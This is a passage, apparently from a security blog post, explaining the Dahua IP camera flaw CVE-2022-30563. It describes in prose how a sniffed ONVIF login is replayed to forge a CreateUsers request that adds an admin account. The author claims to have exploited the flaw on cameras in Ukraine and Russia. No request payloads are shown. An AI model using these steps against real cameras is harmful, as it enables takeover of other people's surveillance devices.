one.\n\n\n\n\nDahua Zero-Day\n\n\n\n\nDahua is a China-based IP camera manufacturer that is among the world&apos;s largest. Besides making cameras with their own name, they also private label cameras for many other re-sellers. Their cameras are literally all over the world!\n\n\n\n\nOn June 28, 2022, the good people at NIST announced a new vulnerability in the Dahua cameras and assigned it CVE-2022-30563 and gave it a base score of 7.8. They described the vulnerability as:\n\n\n\n\nWhen an attacker uses a man-in-the-middle attack to sniff the request packets with success logging in through ONVIF, he can log in to the device by replaying the user&apos;s login packet.\n\n\n\n\nan article on SecurityAffairs.com described the vulnerability in a headline that read:\n\n\n\n\n\"A flaw in Dahua IP Cameras allows full take over of the devices\"\n\n\n\n\nThis was several months after we had been successfully exploiting this flaw in cameras in both Ukraine and Russia.\n\n\n\n\nWhat is ONVIF?\n\n\n\n\nONVIF is the Open Network Video Interface Forum. This is an open standard that is used in IP-based physical security products. ONVIF products allow access through a set of standardized API&apos;s. These API&apos;s allow the user to watch the video from the camera, unlock smart doors, and add users and passwords. ONVIF requests are transmitted through XML SOAP messages.\n\n\n\n\nThe ONVIF accepts, among other authentication mechanisms, WS-UsernameToken such as seen below.\n\n\n\n\nNote that the WS-UsernameToken accepts:\n\n\n\n\n1. \na username\n\n2. \na nonce\n\n3. \nCreated\n\n4. \npassword\n\n\n\n\n\nWS-UsernameToken then generates a Base64 digest. This helps to obscure this data, most importantly, the password from being intercepted an used in a MiTM attack. By incorporating the timestamp, it also prevents replay attacks.\n\n\n\n\n\n\n\n\n\n\nTo be successful, the attacker must first sniff a single unencrypted ONVIF request such as shown above. This is relatively easy as WS-UsernameToken is used by default on these devices and they use HTTP rather than HTTPS, so the transmission is unencrypted.\n\n\n\n\nNext, the attacker then forges a new CreateUsers request that adds a new user with admin privileges!\n\n\n\n\n\n\n\n\n\n\nOnce the new admin account has been created, the attacker can then simply login into the new account and take control of the device. This includes zoom, tilt and pan (if enabled) and deleting other accounts including other admin accounts.\n\n\n\n\n\n\n\n\n\n\n\n\n\nSummary\n\n\n\n\nInternet of Things devices are everywhere and in most cases their security[...]", "creation_timestamp": "2024-09-25T22:32:27.000000Z"}]}